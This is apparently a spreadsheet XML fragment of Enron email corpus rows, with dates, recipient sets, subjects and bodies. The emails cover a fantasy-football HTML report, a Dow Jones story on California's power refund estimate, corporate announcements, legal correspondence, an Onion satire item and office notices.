&lt;BR&gt;_x000D_
&lt;B&gt;Dallas Desperados (AFL)&lt;/B&gt;&lt;BR&gt;_x000D_
&lt;FONT SIZE=2&gt;Signed lineman Shamsud-Din Shaheed. &lt;/FONT&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;B&gt;Detroit Fury (AFL)&lt;/B&gt;&lt;BR&gt;_x000D_
&lt;FONT SIZE=2&gt;Signed wide receiver-defensive back Torey Hunter and lineman Earl Scott; re-signed offensive specialist Robert Gordon and activated him. &lt;/FONT&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;B&gt;Grand Rapids Rampage (AFL)&lt;/B&gt;&lt;BR&gt;_x000D_
&lt;FONT SIZE=2&gt;Signed lineman Israel Raybon. &lt;/FONT&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;B&gt;Tampa Bay Storm (AFL)&lt;/B&gt;&lt;BR&gt;_x000D_
&lt;FONT SIZE=2&gt;Signed lineman Ernest Certain and fullback-linebacker Jeff Macrea; waived wide receiver-defensive back Brad Ford. &lt;/FONT&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;TABLE WIDTH=100% BORDER=0 CELLPADDING=1 CELLSPACING=0 BGCOLOR="#000099"&gt;&lt;TR&gt;&lt;TD ALIGN=left&gt;&lt;FONT FACE=arial color=ffffff SIZE=&gt;&lt;B&gt;Transactions,&amp;nbsp;View&amp;nbsp;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;!-- Pizzahut Presenting Logo Spotlight tag - Do not remove until 12-31-01 --&gt;_x000D_
&lt;SCRIPT language="JavaScript"&gt;_x000D_
if (!random) {if (parent.random) {var random = parent.random} else {var abc = Math.random() + ""; var random = abc.substring(2,abc.length);}}_x000D_
document.write('&lt;IMG SRC="http://ad.doubleclick.net/ad/N1549.sportsline.com/B44933.5;sz=1x1;ord=o;ord='+random+'?" WIDTH=1 HEIGHT=1 BORDER=0&gt;');_x000D_
&lt;/SCRIPT&gt;_x000D_
&lt;NOSCRIPT&gt;_x000D_
&lt;IMG SRC="http://ad.doubleclick.net/ad/N1549.sportsline.com/B44933.5;sz=1x1;ord=1?" WIDTH=1 HEIGHT=1 BORDER=0&gt;_x000D_
&lt;/NOSCRIPT&gt;_x000D_
&lt;!-- end Pizzahut Logo Spotlight tag --&gt;_x000D_
&lt;CENTER&gt;&lt;TABLE BGCOLOR="#bfbfbf" BORDER=2 CELLSPACING=0 CELLPADDING=0&gt;&lt;TR&gt;&lt;TD&gt;_x000D_
&lt;TABLE BORDER=0 CELLSPACING=0 CELLPADDING=2&gt;_x000D_
&lt;TR BGCOLOR=#00007f&gt;_x000D_
&lt;TD COLSPAN=3&gt;_x000D_
&lt;TABLE WIDTH=100% BORDER=0 CELLSPACING=0 CELLPADDING=0&gt;_x000D_
&lt;TR&gt;&lt;TD VALIGN=middle ALIGN=left&gt;&lt;IMG HSPACE=2 VSPACE=2 WIDTH=14 HEIGHT=14 SRC="http://images.commissioner.com/images/eye_device_tiny.gif"&gt;&amp;nbsp;&lt;FONT SIZE=2&gt;&lt;FONT COLOR="#ffffff"&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;B&gt;Make Selection&lt;/B&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;_x000D_
&lt;/TD&gt;_x000D_
&lt;TD ALIGN=right VALIGN=middle&gt;_x000D_
&amp;nbsp;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=home&amp;league=bige01&amp;owner=67142.8&amp;random=792&amp;"&gt;&lt;IMG BORDER=0 ALIGN=absmiddle HSPACE=2 SRC="http://images.commissioner.com/images/wizard/win95/x.gif"&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;_x000D_
&lt;TD WIDTH=25&gt;&lt;BR&gt;&lt;/TD&gt;_x000D_
&lt;TD WIDTH=400 HEIGHT=200&gt;&lt;FONT FACE="Arial, Helvetica" SIZE=2&gt;&lt;TABLE WIDTH=100% BORDER=0 CELLPADDING=0 CELLSPACING=0&gt;&lt;TR&gt;&lt;TD WIDTH=10&gt;&lt;/TD&gt;&lt;TD WIDTH=60&gt;&lt;IMG ALIGN=middle SRC="http://images.commissioner.com/images/wizard/i.gif"&gt;&lt;/TD&gt;&lt;TD&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;There are no League Transactions which meet the selected criteria.&lt;BR&gt;&lt;BR&gt;To see all league transactions select "All", "All", "All Teams" from_x000D_
the Transactions, View page.&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/FONT&gt;&lt;/TD&gt;_x000D_
&lt;TD WIDTH=25&gt;&lt;BR&gt;&lt;/TD&gt;_x000D_
&lt;/TR&gt;&lt;/TABLE&gt;_x000D_
&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;_x000D_
&lt;/CENTER&gt;&lt;TABLE WIDTH=100% BORDER=0 CELLPADDING=1 CELLSPACING=0 BGCOLOR="#000099"&gt;&lt;TR&gt;&lt;TD ALIGN=left&gt;&lt;FONT FACE=arial color=ffffff SIZE=&gt;&lt;B&gt;Schedule,&amp;nbsp;Breakdown&amp;nbsp;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;!-- Pizzahut Presenting Logo Spotlight tag - Do not remove until 12-31-01 --&gt;_x000D_
&lt;SCRIPT language="JavaScript"&gt;_x000D_
if (!random) {if (parent.random) {var random = parent.random} else {var abc = Math.random() + ""; var random = abc.substring(2,abc.length);}}_x000D_
document.write('&lt;IMG SRC="http://ad.doubleclick.net/ad/N1549.sportsline.com/B44933.5;sz=1x1;ord=o;ord='+random+'?" WIDTH=1 HEIGHT=1 BORDER=0&gt;');_x000D_
&lt;/SCRIPT&gt;_x000D_
&lt;NOSCRIPT&gt;_x000D_
&lt;IMG SRC="http://ad.doubleclick.net/ad/N1549.sportsline.com/B44933.5;sz=1x1;ord=1?" WIDTH=1 HEIGHT=1 BORDER=0&gt;_x000D_
&lt;/NOSCRIPT&gt;_x000D_
&lt;!-- end Pizzahut Logo Spotlight tag --&gt;_x000D_
&lt;IMG WIDTH=1px HEIGHT=1px SRC="http://football299.fantasy.sportsline.com/mp/open_gif?splnid=cefb914897ed7c42&amp;league=bige01&amp;owner=67142.8&amp;email=ffc7cee93a3eb671fe55645da5681dde82f0bade1a9f7052&amp;sport=football&amp;vend=CBS%20SportsLine.com&amp;product=mgmt&amp;time=20011221&amp;type=ereport&amp;random=792"&gt;&lt;HR&gt;&lt;CENTER&gt;Copyright 2001 Commissioner.COM Inc and SportsLine.com Inc.&lt;BR&gt;Your site can be reached from &lt;A HREF=http://fantasy.sportsline.com&gt;http://fantasy.sportsline.com&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;FB10SP&lt;BR&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;</t>
  </si>
  <si>
    <t>Wed, 28 Jun 2000 08:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">JD is a dead man.   Are you going to give Kori a birthday smooch!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Chad Gronvold_x000D_
06/28/2000 03:26 PM_x000D_
To: Chris Germany/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re:  _x000D_
_x000D_
Who's birthday?  I'll probably go.  I might try to go to Branson sometime _x000D_
this weekend, but I should be back by then.  Let me know when and where.  _x000D_
After this Friday, use this as my e-mail:_x000D_
_x000D_
c1h2a3d4@earthlink.net_x000D_
_x000D_
or (after mid July)_x000D_
_x000D_
chad.gronvold@owen2002.vanderbilt.edu_x000D_
_x000D_
By the way,  how's Stephanie doing?  JD seems to be doing well._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 18 Jul 2001 09:18:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kristin.walsh@enron.com', 'janel.guerrero@enron.com', 'mpalmer@enron.com', 'harry.kingerski@enron.com', 'linda.robertson@enron.com', 'james.steffes@enron.com', 'richard.shapiro@enron.com', 'karen.denne@enron.com', 'michael.tribolet@enron.com', 'paul.kaufman@enron.com', 'skean@enron.com', 'susan.mara@enron.com', 'susan.landwehr@enron.com', 'leslie.lawner@enron.com'})</t>
  </si>
  <si>
    <t>CAISO cuts refund estimate to $6.1B from $8.9B</t>
  </si>
  <si>
    <t xml:space="preserve">Calif ISO Cuts Power Refund Estimate To $6.1B From $8.9B    =20_x000D_
Updated: Wednesday, July 18, 2001 11:53 AM=01;ET    =01;=20_x000D_
=01;_x000D_
_x000D_
By Mark Golden=20_x000D_
_x000D_
Of DOW JONES NEWSWIRES=20_x000D_
_x000D_
_x000D_
NEW YORK (Dow Jones)--California's estimate of how much the state was=20_x000D_
overcharged by power suppliers dropped to $6.1 billion from $8.9 billion wh=_x000D_
en=20_x000D_
an adjustment requested by a Federal Energy Regulatory Commission judge was=_x000D_
=20_x000D_
taken into account, according to data submitted to FERC last week.=20_x000D_
_x000D_
The California Independent System Operator's estimate fell when the grid=20_x000D_
operator excluded power bought by utilities not under its purview, and its=_x000D_
=20_x000D_
estimate could fall again as it works in other recommendations made by the=_x000D_
=20_x000D_
judge following the conclusion of 15 days of talks between power suppliers=_x000D_
=20_x000D_
and the state over potential refunds last week.=20_x000D_
_x000D_
Even as the ISO continues to recalculate its refund estimate, however, the=_x000D_
=20_x000D_
state is sticking to the original $8.9 billion figure, which has been calle=_x000D_
d=20_x000D_
arbitrary by critics. The $6.1 billion estimate merely establishes "a=20_x000D_
potential framework for settlement discussions," Eric Hildebrandt, the ISO'=_x000D_
s=20_x000D_
chief analyst on the matter, told the FERC.=20_x000D_
_x000D_
FERC administrative law judge Curtis Wagner, who has dismissed the $8.9=20_x000D_
billion figure as baseless and criticized California's delegation for not=_x000D_
=20_x000D_
negotiating in good faith, estimated in his report on the talks that refund=_x000D_
s=20_x000D_
due may amount to about $1 billion. Power suppliers offered just over $700=_x000D_
=20_x000D_
million.=20_x000D_
_x000D_
Wagner has recommended FERC hold a 60-day hearing to set the level of refun=_x000D_
ds=20_x000D_
and has told the ISO to revise its estimate of what California is owed.=20_x000D_
_x000D_
The ISO's original $8.9 billion figure included electricity sales to=20_x000D_
municipal utilities and alternative energy suppliers that didn't go through=_x000D_
=20_x000D_
the ISO's wholesale markets, the California Power Exchange or the Californi=_x000D_
a=20_x000D_
Department of Water Resources. Without direct knowledge of the prices of=20_x000D_
those purchases, the ISO made estimates.=20_x000D_
_x000D_
"We know the volume (of the bilateral deals)," Hildebrandt said. "The refun=_x000D_
d=20_x000D_
amount was based on extrapolation of observed prices in the spot market."=_x000D_
=20_x000D_
_x000D_
_x000D_
Resetting The Baseline=20_x000D_
_x000D_
_x000D_
Wagner told the ISO to recalculate its figure using only sales through the=_x000D_
=20_x000D_
ISO and CalPX markets - which were set up by the state's deregulation law f=_x000D_
or=20_x000D_
California's three investor-owned utilities to purchase power - in addition=_x000D_
=20_x000D_
to sales to the California Department of Water Resources.=20_x000D_
_x000D_
The DWR has been buying power for the utilities since PG&amp;E Corp. (PCG, news=_x000D_
,=20_x000D_
msgs) unit Pacific Gas &amp; Electric Co. and Edison International (EIX, news,=_x000D_
=20_x000D_
msgs) unit Southern California Edison ran out of cash in January. DWR has=_x000D_
=20_x000D_
also been covering the needs of Sempra Energy (SRE, news, msgs) unit San=20_x000D_
Diego Gas &amp; Electric Co.=20_x000D_
_x000D_
In arriving at his new estimate, the ISO's Hildebrandt also recalculated fa=_x000D_
ir=20_x000D_
prices - the baseline against which refundable amounts are determined - by=_x000D_
=20_x000D_
retroactively applying the price controls FERC imposed June 19. Those=20_x000D_
controls set prices by the operating costs of the least efficient generator=_x000D_
=20_x000D_
needed to meet demand each hour.=20_x000D_
_x000D_
But last week, after Hildebrandt completed his $6.1 billion estimate, Wagne=_x000D_
r=20_x000D_
recommended to FERC commissioners that the June 19 price control formula be=_x000D_
=20_x000D_
modified when used retroactively to determine refunds.=20_x000D_
_x000D_
Those modifications, if applied to the ISO's estimate, would cut refunds mu=_x000D_
ch=20_x000D_
further. For example, FERC's price limits are now based on a monthly averag=_x000D_
e=20_x000D_
of natural gas prices covering supplies throughout the state. Wagner=20_x000D_
recommended using power producers' actual gas costs. Since gas is=20_x000D_
considerably more expensive in southern California, using actual prices wou=_x000D_
ld=20_x000D_
cut potential refunds sharply.=20_x000D_
_x000D_
Also, Wagner said that refunds should be ordered on sales only as far back =_x000D_
as=20_x000D_
Oct. 2, which would reduce the total amount claimed by California by about=_x000D_
=20_x000D_
one-third, according to Hildebrandt's previous monthly breakdown.=20_x000D_
_x000D_
ISO staff is again recalculating the refund estimate to reflect some of=20_x000D_
Wagner's recommendations, but the ISO will still include sales back to May=_x000D_
=20_x000D_
2000, said spokeswoman Stephanie McCorkle.=20_x000D_
_x000D_
"The reason we're not going back just to Oct. 2 is that all of the=20_x000D_
overcharges going back to May should be repaid," McCorkle said. "We just=20_x000D_
maintain that position."=20_x000D_
_x000D_
_x000D_
FERC Baseline Questioned=20_x000D_
_x000D_
_x000D_
In addition, Hildebrandt argues in his recently released estimate that when=_x000D_
=20_x000D_
fair prices are calculated retroactively using FERC's new formula, the pric=_x000D_
e=20_x000D_
cap should be based on the least efficient generator the ISO knows to have=_x000D_
=20_x000D_
been available, not the least efficient generator actually used to meet=20_x000D_
demand.=20_x000D_
_x000D_
That's because the FERC's new price controls require all available generato=_x000D_
rs=20_x000D_
be made available to the ISO at any time, Hildebrandt said.=20_x000D_
_x000D_
Applying that rule would raise the ISO's revised estimate substantially: to=_x000D_
=20_x000D_
$7.7 billion from $6.1 billion.=20_x000D_
_x000D_
One of the ways generators managed to manipulate prices higher, Hildebrandt=_x000D_
=20_x000D_
said, was to not offer cheaper power from more efficient units. Considering=_x000D_
=20_x000D_
only the least efficient generator actually used would make permanent the=_x000D_
=20_x000D_
rewards for such withholding, he said.=20_x000D_
_x000D_
"The judge is in error to suggest that the actual (least-efficient) unit us=_x000D_
ed=20_x000D_
would have been called on if the must-offer requirement were in effect,"=20_x000D_
Hildebrandt said in an interview.=20_x000D_
_x000D_
In arriving at his estimate, Hildebrandt determined the difference between=_x000D_
=20_x000D_
actual sales prices and what prices would have been for every seller and fo=_x000D_
r=20_x000D_
every hour since May 1, 2000, had price controls been in effect. The ISO=20_x000D_
released only the total potential refund, not the company-specific shares.=_x000D_
=20_x000D_
_x000D_
Hildebrandt took issue with generating companies that have complained his=_x000D_
=20_x000D_
numbers aren't justified.=20_x000D_
_x000D_
"These are based on very tangible records," he said. "The idea that it's a=_x000D_
=20_x000D_
black box is misleading."=20_x000D_
_x000D_
-By Mark Golden, Dow Jones Newswires; 201-938-4604; mark.golden@dowjones.co=_x000D_
m=20_x000D_
_x000D_
(Jason Leopold in Los Angeles contributed to this article.)=20_x000D_
</t>
  </si>
  <si>
    <t>Mon, 8 May 2000 05:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Put us down for 50.</t>
  </si>
  <si>
    <t>Thu, 25 Jan 2001 07:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Remaining UA4 Meter variances</t>
  </si>
  <si>
    <t xml:space="preserve">Last one, Shawnee Springs meter 986315.  Purchase should be from Torch on the _x000D_
215....  Was on deal ticket 138605, which expired in September, and has been _x000D_
allocated to up until Nov.   I think that Torch is now Cleco.  There should _x000D_
be a purch. at the meter.  Once we get the last two, you are done._x000D_
_x000D_
Mary   </t>
  </si>
  <si>
    <t>Tue, 24 Apr 2001 06:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>NYISO's Response to Management Committee's Motion related to_x000D_
	 Temporal Consistency of LIPA Data</t>
  </si>
  <si>
    <t>On April 12, 2001, the Management Committee direct_x000D_
NYISO Staff to review the temporal consistency of_x000D_
the unavailability data used in the 2001 Locational_x000D_
ICAP Requirements Study.  The attached document_x000D_
describes NYISO Staff's review of the unavailability_x000D_
data and its findings._x000D_
_x000D_
_x000D_
(See attached file: MC_Temporal_Consistency_Data_Review.PDF)_x000D_
_x000D_
 - MC_Temporal_Consistency_Data_Review.PDF</t>
  </si>
  <si>
    <t>Tue, 18 Jul 2000 06:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Robin,_x000D_
I took a look at how the Exotics book is being pulled in and everything looks _x000D_
fine with the exception of the Nymex equivalency factor for AECOUS.  Would _x000D_
you be able to change the factor from 1 to .8 until March 2002._x000D_
Thanks_x000D_
Kathy_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Robin Rodrigue_x000D_
07/17/2000 06:39 PM_x000D_
To: Kathy Reeves/CAL/ECT@ECT, Nicole LaPorte/CAL/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re:  _x000D_
_x000D_
_x000D_
_x000D_
Sorry it took so long._x000D_
_x000D_
Robin_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 31 May 2001 04:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Draft of Organizational Announcement</t>
  </si>
  <si>
    <t>Announcing the Formation of One Corporate Equity Investing Unit_x000D_
_x000D_
To better develop and manage equity investment opportunities related to our _x000D_
core businesses, Enron has formed one corporate equity investment unit.  This _x000D_
new unit, Enron Principal Investments, will combine the existing investment _x000D_
units of ENA, EBS and Enron Investment Partners.  The strategy of Enron _x000D_
Principal Investments will be to work with the all the business units across _x000D_
Enron to identify, execute, and manage equity investments, which leverage the _x000D_
unique and proprietary knowledge of Enron.   These investments may be in the _x000D_
form of venture capital, LBO's, traditional private equity and distressed _x000D_
debt positions. _x000D_
_x000D_
Kevin Garland will serve as Managing Director, overseeing all activities of _x000D_
Enron Principal Investments.  Michael Miller and Gene Humphrey will both join _x000D_
Enron Principal Investments as senior investment professionals in the group.  _x000D_
Additionally, many other legacy investment positions existing in Enron will _x000D_
be transferred to Enron Principal Investments.  Richard Lydecker will _x000D_
continue to manage these legacy investments.  _x000D_
_x000D_
This new investment unit will report to Greg Whalley, in his capacity as an _x000D_
Enron Policy Committee member.  Please join me in congratulating and _x000D_
supporting Kevin, Michael, Gene, Richard and the other members of this group _x000D_
in this effort._x000D_
_x000D_
Jeff Skilling</t>
  </si>
  <si>
    <t>Tue, 20 Feb 2001 08:16:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Transfer of bond business from ENAC to ECI</t>
  </si>
  <si>
    <t xml:space="preserve">Richard:_x000D_
_x000D_
Further to my message below, after speaking with Sheila, it appears that the _x000D_
Securities Loan Agreement that ENA will sign (hopefully tomorrow) is actually _x000D_
the same agreement to be used by Enron Credit Inc. ("ECI").   I think we can _x000D_
have this assigned from ENA to ECI.  We will have to get a new guaranty from _x000D_
Enron Corp.  I still do not know anything about the Bear guaranty that you _x000D_
mentioned in your email.  Please advise._x000D_
_x000D_
Also, please verify for me which office will prepare confirmations for ECI.  _x000D_
If it is London, is there a services agreement in place between ENA and EI?_x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com_x000D_
----- Forwarded by Sara Shackleton/HOU/ECT on 02/20/2001 04:05 PM -----_x000D_
_x000D_
	Sara Shackleton_x000D_
	02/20/2001 09:23 AM_x000D_
		_x000D_
		 To: Richard Sage/LON/ECT_x000D_
		 cc: Tanya Rohauer/HOU/ECT@ECT_x000D_
		 Subject: Re: Transfer of bond business from ENAC to ECI_x000D_
_x000D_
Richard:_x000D_
_x000D_
Your deadlines for the securities loan agreement for and related guaranties _x000D_
are impossible to meet  (2/16/01 was last Friday).  The same agreement with _x000D_
ENA has yet to be completed due to protracted negotiations.  _x000D_
_x000D_
Please advise as to who in credit approved the USD25million Enron Corp. _x000D_
guaranty on behalf of ECI.  Also, FYI, Bear will not provide a reciprocal _x000D_
guaranty for ENA._x000D_
_x000D_
Sara Shackleton_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3801a_x000D_
Houston, Texas  77002_x000D_
713-853-5620 (phone)_x000D_
713-646-3490 (fax)_x000D_
sara.shackleton@enron.com_x000D_
_x000D_
_x000D_
_x000D_
	Richard Sage_x000D_
	02/18/2001 09:07 PM_x000D_
		 _x000D_
		 To: Sheila Glover/HOU/ECT@ECT, Tom Doukas/NA/Enron@ENRON, David A Wall/Risk _x000D_
Mgmt/LON/ECT@ECT, Ian Sloman/LON/ECT@ECT, Sara Shackleton/HOU/ECT@ECT, _x000D_
Richard Kerr/Corp/Enron@ENRON, Stephanie Panus/NA/Enron@Enron, Teresa _x000D_
Callahan/Enron@EnronXGate, Sue Kelly/LON/ECT@ECT, Stephen Bell/LON/ECT@ECT_x000D_
		 cc: Denis O'Connell/LON/ECT@ECT_x000D_
		 Subject: Transfer of bond business from ENAC to ECI_x000D_
_x000D_
All,_x000D_
So that everyone can see what everone else is doing, below is the list of _x000D_
steps of which I am aware._x000D_
I think quite a few of these were completed in Houston on Friday._x000D_
Please shout if:_x000D_
- I have missed anything_x000D_
- Any deadlines are unrealistic_x000D_
- Anybody else should be copied in_x000D_
etc_x000D_
_x000D_
Thanks,_x000D_
Richard_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>From theonion</t>
  </si>
  <si>
    <t>Gore Calls For Recount Of Supreme Court Vote_x000D_
_x000D_
WASHINGTON, DC-- An increasingly desperate Al Gore called for a recount _x000D_
Tuesday of the _x000D_
U.S. Supreme Court's 9-0 decision in Bush v. Palm Beach County Canvassing _x000D_
Board. "There _x000D_
is reason to suspect that these nine votes were not properly counted and that _x000D_
as many as five _x000D_
justices who sided with Mr. Bush did not intend to do so," Gore said. "It is _x000D_
therefore in the best _x000D_
interest of our democracy for the U.S. Supreme Court to suspend judgment in _x000D_
this case until we _x000D_
can be absolutely certain that this court did, in fact, intend to rule in Mr. _x000D_
Bush's favor." Gore added _x000D_
that if his recount request is denied, he will file an appeal with the _x000D_
Interplanetary Supreme Court.</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 03:20:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mark.tawney@enron.com', 'daniel.reck@enron.com', 'kevin.mcgowan@enron.com', 'eric.gonzales@enron.com'})</t>
  </si>
  <si>
    <t>Please expect a call from Joe Hartsoe in the very near future.  His _x000D_
background lends itself to our businesses, and he is looking to add some _x000D_
commercial experience to his c.v.  Thanks for taking the time to meet with _x000D_
Joe._x000D_
_x000D_
Jeff</t>
  </si>
  <si>
    <t>Mon, 14 Jan 2002 06:40:14 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'w..white@enron.com', 'm.hall@enron.com', 'c..gossett@enron.com', 'leslie.reeves@enron.com'})</t>
  </si>
  <si>
    <t>FW: Estate Integration Test - 1/13/2001</t>
  </si>
  <si>
    <t>FYI!_x000D_
 _x000D_
 _x000D_
-----Original Message-----_x000D_
From: Sanvido, Terry _x000D_
Sent: Sunday, January 13, 2002 6:29 PM_x000D_
To: Brackett, Debbie R.; Hare, Bill D.; Hayden, Frank; Jaquet, Tammy; McLaughlin Jr., Errol; Moorer, Torrey; Rodriguez, Bernice; Sweitzer, Tara; Theriot, Kim S.; Winfree, O'Neal D.; Dupuy, Mark; Gillis, Brian; Heal, Kevin; McKeel, Richard; Reeves, Kathy; Seib, Dianne; Vander velde, Nikole; Anderson, Diane; Baker, Natalie; Baxter, Bryce; Bowen, Bob; Campos, Sylvia A.; Garcia, Clarissa; Hilliard, Marlene; Hunter, Larry Joe; Price, Wade R.; Richardson, Stacey; Schrab, Mark L.; Severson, Russ; Spears, Christopher; Sullivan, Patti; Wallumrod, Ellen; Wynne, Rita; Chitradurga, Sundar; Cinelli, Steve; Elwood, Richard; Franks, Shawn; Greig, Iain; Harmon, Kenneth M.; Hunter, Wade; Johnson, Jeff; Nolte, Ron; Powell, John D.; Ramesh, Ganapathy; Saleem, Aftab; Sanvido, Terry; Smith, Regan M.; Allen, Thresa A.; Aucoin, Evelyn; Bentley, Corry; Clemons, Amy; Dahlke, Andrea; Denton, Rhonda L.; Evans, Casey; Murphy, Melissa; Robinson, Rhonda; Stevens, Mechelle_x000D_
Subject: Estate Integration Test - 1/13/2001_x000D_
_x000D_
_x000D_
When you look back over the past few weeks, you realized that a tremendous amount of work was done and it resulted in only a few minor issues during today' s integration test. Everyone involved should give himself or herself a well-deserved pat on the back._x000D_
 _x000D_
Thank You!_x000D_
 _x000D_
During the upcoming week, the integration test team will be concentrating on resolving any outstanding issues for Estate and completing the Netco integration tests. For the most part, we will use the same test scripts used for Estate; the major differences are EOL and SAP. The plan is to complete the testing by end of day on Friday, January 18th. _x000D_
 _x000D_
Problem resolution Monday - Wednesday - procedure_x000D_
_x000D_
Contact the Bridgeline 800-711-8000 (Code #3454709) from 7am - 7pm.  This will be the most effective of tracking, dispatching to the application representatives.  The integration test team will be monitoring and have access to the escalation procedures._x000D_
_x000D_
For those individuals who work in Unify, please remember to logoff and log back into Windows prior to accessing Unify. Please pass this information on to your co-workers. _x000D_
 _x000D_
Just a reminder, for those individuals who participated in the testing, please clean up (zero out, un-officialize, etc.), do not kill the deal, any deals created during the testing for Sitara, TAGG, EnPower, Unify PM, Unify VM, Unify Settlements, CAS and ?????:_x000D_
 _x000D_
Thank You,_x000D_
 _x000D_
Integration Test Team</t>
  </si>
  <si>
    <t>Wed, 8 Nov 2000 02:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mary.poorman@enron.com', 'tom.acton@enron.com', 'pat.clynes@enron.com', 'sabrae.zajac@enron.com', 'robert.cotten@enron.com', 'jackie.young@enron.com', 'susan.hadix@enron.com', 'carlos.rodriguez@enron.com', 'clem.cernosek@enron.com', 'liz.bellamy@enron.com', 'eddie.janzen@enron.com', 'daren.farmer@enron.com', 'aimee.lannou@enron.com', 'mark.mccoy@enron.com'})</t>
  </si>
  <si>
    <t>Out of the office</t>
  </si>
  <si>
    <t>I will be out of the office starting this afternoon 11/8 and will be back on _x000D_
Monday. Aimee 3-0506 will be the point person for any questions but the _x000D_
following people will do some of my desk, thanks._x000D_
_x000D_
Mark - HPL Pools_x000D_
Bob C - Daily noms, path ENE and Bridge Back_x000D_
Tom - Tufco _x000D_
Sabrae - BP transport, NNGB, Carthage_x000D_
_x000D_
If you have any questions please let Aimee know, thanks_x000D_
_x000D_
Carlos</t>
  </si>
  <si>
    <t>Mon, 21 Aug 2000 04:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sdunn@dlj.com'})</t>
  </si>
  <si>
    <t>Schedule to Master Agreement Draft of 8/21/00 - ECT/DLJ</t>
  </si>
  <si>
    <t xml:space="preserve">  Suanne,_x000D_
_x000D_
Attached please find a blacklined draft to the Schedule.  This draft reflects _x000D_
a few minor changes to the Guaranty from the draft you received last week.  _x000D_
Please call me at 713-220-4124 with any comments or questions._x000D_
_x000D_
Jason Peters_x000D_
_x000D_
 - Blacklin.DOC</t>
  </si>
  <si>
    <t>Mon, 4 Jun 2001 09:05:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Scheduling Time w/Greg Whalley</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Drew,_x000D_
_x000D_
Greg will be in the London office from early Tuesday afternoon through _x000D_
end-of-business day on Thursday, June 7.  Are you available to meet w/him for _x000D_
about an hour? He's available Tuesday afternoon until 5:00 p.m.  Wednesday _x000D_
there are a few slots available, and Thursday he is wide open.  If you could _x000D_
e-mail me your availability that would be great.  Also, Greg will be carrying _x000D_
mobile number +44 7901516638._x000D_
_x000D_
Many Thanks,_x000D_
_x000D_
Liz Taylor_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 26 Sep 2001 17:55:33 -0700 (PDT)</t>
  </si>
  <si>
    <t>New Course Offerings</t>
  </si>
  <si>
    <t>Communicating Across Differences - October 10, 2001 _x000D_
DoubleTree Hotel - DeZavala_x000D_
8:00 am - 12:00 pm          Cost:  $350_x000D_
_x000D_
This course focuses on using the world's most powerful personality profile, the Myers-Briggs Type Indicator (MBTI) to learn to communicate and work with people whose personalities and communication styles are different from your own.  It begins from the foundation of understanding your own personality and communication approach, then moves to applying that knowledge to improve communication with others.  One of the additional tools used in this course is the "MBTI Work Styles"-which explores in detail how personality differences affect people's approach to work and communication._x000D_
_x000D_
The program is highly interactive, with exercises and activities that enable participants to truly experience how human personality impacts people's communication, priorities, decision-making, and work style.  It is also highly practical, focusing on maximizing successful business outcomes through effective communication._x000D_
_x000D_
_x000D_
_x000D_
Achieving Results Through Coaching - October 10, 2001_x000D_
DoubleTree Hotel - DeZavala_x000D_
1:00 pm - 5:00 pm          Cost:  $350_x000D_
_x000D_
This course uses a classic competency model, as well as a powerful assessment of interpersonal communication style, called the FIRO-B, as a foundation for coaching.  It teaches the coach to think himself or herself back through their own learning stages in order to coach others effectively.  It also teaches participants to recognize the different stages where the various people they coach might be and adapt their coaching style as employees move from stage to stage.  It also helps participants understand their own interpersonal communication style, through the FIRO-B, and learn to leverage it for greatest effectiveness as a coach._x000D_
_x000D_
Participants will create coaching action plans for use with employees._x000D_
_x000D_
_x000D_
For registration, please login to our website http://elm.enron.com "Management/Leadership"    If you have problems registering or have any questions, please call 713-853-0357.</t>
  </si>
  <si>
